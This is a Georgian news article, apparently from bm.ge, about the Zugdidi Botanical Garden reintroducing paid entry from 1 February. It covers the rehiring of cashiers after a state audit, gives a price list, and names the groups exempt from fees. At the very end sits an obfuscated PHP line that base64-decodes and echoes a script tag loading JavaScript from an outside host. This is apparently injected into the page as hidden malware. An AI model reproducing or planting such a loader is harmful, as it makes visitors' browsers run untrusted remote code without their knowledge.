celsiusi
ავერსი საქკაბელი
1-ელი თებერვლიდან ზუგდიდის ბოტანიკური ბაღში შესვლა ფასიანი გახდება. როგორც bm.ge-ს ბოტანიკური ბაღის დირექტორმა, ზვიად ქარჩავამ განუცხადა, სწორედ ამ დროიდან სამსახურში აღდგებიან ის მოლარე-ოპერატორები, რომლებსაც 2020 წელს ხელშეკრულებები დაუმთავრდათ და სამსახურიდან დროებით გათავისუფლდნენ.
 
რაც შეეხება ფასებს, ქარჩავას გამნმარტებით, ფასები პანდემიამდელ პერიოდთან შედარებით მცირედით დაკორექტირდა. ბოტანიკურ ბაღში შესვლა პანდემიამდე ფასიანი იყო, 2020 წელს შესვლა უფასო გახდა, პირველი თებერვლიდან კი კვლავ ფასიანი ხდება.
 
ზუგდიდის ბოტანიკური ბაღი და მისი თანამშრომლების საკითხი აქტუალური გახდა მას შემდეგ, რაც სახელმწიფო აუდიტის სამსახურმა გამოაქვეყნა 2019-2020 წლების შესაბამისობის აუდიტი, რომელშიც აღნიშნული იყო, რომ ბაღის ადმინისტრაცია ასაქმებდა 6 მოლარე-კონსულტანტს, მიუხედავად იმისა, რომ ბაღში შესვლა უფასო იყო.
 
მოგვიანებით, საკითხზე bm.ge ესაუბრა ბოტანიკური ბაღის დირექტორს, რომელმაც განმარტა, რომ უფასოდ შესვლის პერიოდში დასაქმებული მოლარეები კონსულტანტების მოვალეობას ასრულებდნენ.
 
პირველი თებერვილდან ბაღში შესვლისას იმოქმედებს შემდეგი ტარიფები:
 
▪ საქართველოს მოქალაქე - 2 ლარი;
▪️ უცხო ქვეყნის მოქალაქე - 5 ლარი;
▪️ საქართველოს აკრედიტებული უმაღლესი სასწავლებლების სტუდენტები -1 ლარი;
▪️ სკოლის მოსწავლე 10 წელზე ზევით - 1 ლარი;
▪️ ერთთვიანი აბონემენტი 1 ვიზიტორზე - 10 ლარი;
▪️ სამთვიანი ამონემენტი 1 ვიზიტორზე - 25 ლარი;
▪️ ექვსთვიანი აბონემენტი 1 ვიზიტორზე - 40 ლარი;
▪️ ერთწლიანი აბონემენტი 1 ვიზიტორზე-70 ლარი;
▪️ ერთთვიანი საოჯახო " მეგობარათი" აბონემენტი (არაუმეტეს 5 ადამიანი) - 20ლარი;
▪️ სამთვიანი საოჯახო აბონემენტი "მეგობარათი" (არაუმეტეს 5 ადამიანი) - 35ლარი;
▪️ პიკნიკი 1 ვიზიტორზე ( საქართველოს მოქალაქე) - 10 ლარი;
▪️ კემპინგი 1 ვიზიტორზე (უცხო ქვეყნის მოქალაქე) - 15 ლარი;
▪️ ფოტოსესია - 50 ლარი.
 
ზუგდიდის ბოტანიკური ბაღის ტერიტორიის უფასოდ დათვალიერების უფლებით ისარგებლებენ: ომის მონაწილეები; პენსიონრები; საპატიო ზუგდიდელები; ობოლი, მშობელთა მზრუნველობას მოკლებული მოზარდები; საქართველოს შეიარაღებული ძალების ვეტერანები და მათთან გათანაბრებული პირები; ოჯახები, რომელთა სოციალური სარეიტინგო ქულა არ არემატება 100-000-ს.
1046
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");